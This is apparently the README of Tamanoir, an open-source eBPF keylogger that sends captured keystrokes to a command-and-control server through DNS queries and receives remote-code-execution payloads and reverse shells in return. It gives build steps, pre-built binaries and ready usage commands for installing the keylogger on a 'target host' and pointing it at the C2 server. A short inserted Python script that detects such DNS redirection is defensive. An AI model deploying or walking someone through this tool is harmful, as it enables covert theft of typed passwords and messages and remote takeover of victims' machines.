
<div align="center"> <h1>Tamanoir</h1> <h3>An eBPF🐝 Keylogger with <br>C2-based RCE payload delivery</h3> <img src="https://github.com/user-attachments/assets/47b8a0ef-6a52-4e2d-8188-e77bb9e98d79" style="width: 30%; height: auto;"> <p><small><i>A large anteater of Central and South America, Myrmecophaga tridactyla</i></small></p> </div>

⚡ Powered by Aya, Tokio, Tonic and Ratatui

💡Overview

Tamanoir is structured around 3 components:

1. Tamanoir

An eBPF program running on a target host. It acts as a keylogger and extracts keystrokes via DNS queries.<br> In the DNS response, the attacker can choose to send chunks of an RCE payload that will be executed on the targeted host.

2. Tamanoir-C2

The Command & Control server. It acts as a DNS proxy and can inject RCE payloads in DNS responses.<br> It can also handle reverse shell connections.

3. Tamanoir-tui

The TUI client that communicates with the C2 server. Built on top of ratatui.

<div align="center"> <img src="https://github.com/user-attachments/assets/eb671b0a-9431-41b7-9d41-4a35f222a728" style="width: 100%; height: auto;"> <p><small><i>Tui client demo</i></small></p> </div>

Glossary

  • what is eBPF
  • C2: Command and Control
  • RCE: Remote Code Execution

Documentation

Architecture

<div align="center"> <img src="https://github.com/user-attachments/assets/725c9623-ae8e-4d7e-9210-0785d5f28d6e" style="width:75%"> </div>

🚀 Setup

You need a Linux-based OS.

⚒️ Build from source

To build from source, make sure you have:

  • bpf-linker installed.
  • Rust installed with nightly toolchain.
  • protobuf-compiler

1. Build the eBPF program

```
cd tamanoir-ebpf && cargo build --release
```

2. Build the user space program

```
cargo build -p tamanoir --release
```

3. Build the C2 server

```
cargo build -p tamanoir-c2 --release
```

4. Build the Ratatui client

```
cargo build -p tamanoir-tui --release
```

These commands will produce the tamanoir, tamanoir-c2 and tamanoir-tui executables in target/release, which you can add to your `$PATH`.

📥 Binary release

You can download the pre-built binaries from the release page.

<br>

🪄 Usage

Tamanoir

🖥️ On the target host:

```
RUST_LOG=info sudo -E tamanoir \
              --proxy-ip <C2 server IP> \
              --hijack-ip <locally configured DNS server IP> \
              --iface <network interface name>
```

For example:

```
RUST_LOG=info sudo -E tamanoir \
              --proxy-ip 192.168.1.15 \
              --hijack-ip 8.8.8.8 \
              --iface wlan0
```

<br>
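
A network-side check for the DNS redirection described above, as an added example that is not part of the Tamanoir project: it flags hosts whose port-53 traffic reaches a resolver outside an approved set. The flow-record format, the sample records and the function names are constructed for illustration, and it assumes that queries meant for the `--hijack-ip` resolver appear on the wire addressed to the `--proxy-ip` host.

```python
import ipaddress
from collections import defaultdict

# Constructed flow records (not captured traffic): "src dst proto dport packets"
SAMPLE_FLOWS = """\
10.0.0.21 8.8.8.8 udp 53 14
10.0.0.22 192.168.1.15 udp 53 37
10.0.0.22 93.184.216.34 tcp 443 120
10.0.0.23 8.8.8.8 udp 53 9
10.0.0.23 192.168.1.15 udp 53 2
garbage line
""".splitlines()

# Assumption: the only resolver that hosts on this network are configured to use.
APPROVED_RESOLVERS = {"8.8.8.8"}


def dns_destinations(flows):
    """Return {src: {dst: packets}} for port-53 flows, skipping malformed records."""
    seen = defaultdict(lambda: defaultdict(int))
    for line in flows:
        parts = line.split()
        if len(parts) != 5:
            continue
        src, dst, proto, dport, packets = parts
        try:
            ipaddress.ip_address(src)
            ipaddress.ip_address(dst)
            dport, packets = int(dport), int(packets)
        except ValueError:
            continue
        if dport == 53 and proto in ("udp", "tcp"):
            seen[src][dst] += packets
    return seen


def flag_unapproved_dns(flows, approved):
    """Report hosts whose DNS traffic reaches resolvers outside the approved set."""
    findings = []
    for src, dsts in sorted(dns_destinations(flows).items()):
        rogue = {d: n for d, n in dsts.items() if d not in approved}
        if not rogue:
            continue
        # No traffic at all to an approved resolver suggests every query is redirected.
        severity = "high" if not (set(dsts) & approved) else "medium"
        findings.append({"host": src, "severity": severity, "unapproved": rogue})
    return findings


if __name__ == "__main__":
    for finding in flag_unapproved_dns(SAMPLE_FLOWS, APPROVED_RESOLVERS):
        print(finding)
```

Blocking outbound port 53 to anything but the approved resolvers at the network edge enforces the same policy that this check only reports on.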

C2 Server

🖥️ On your C2 server host:

```
sudo tamanoir-c2 start
```

[!NOTE] Make sure port 53 is available

<br>

Tui Client

🖥️ Wherever you want to use the client:

```
tamanoir-tui -i <C2 server IP>
```

[!NOTE] Make sure the C2 server is reachable on port 50051

<br>

⚠️ Disclaimer

Tamanoir is developed for educational purposes only.

<br>

✍️ Authors

Adrien Gaultier, Badr Badri

<br>

⚖️ License

GPLv3
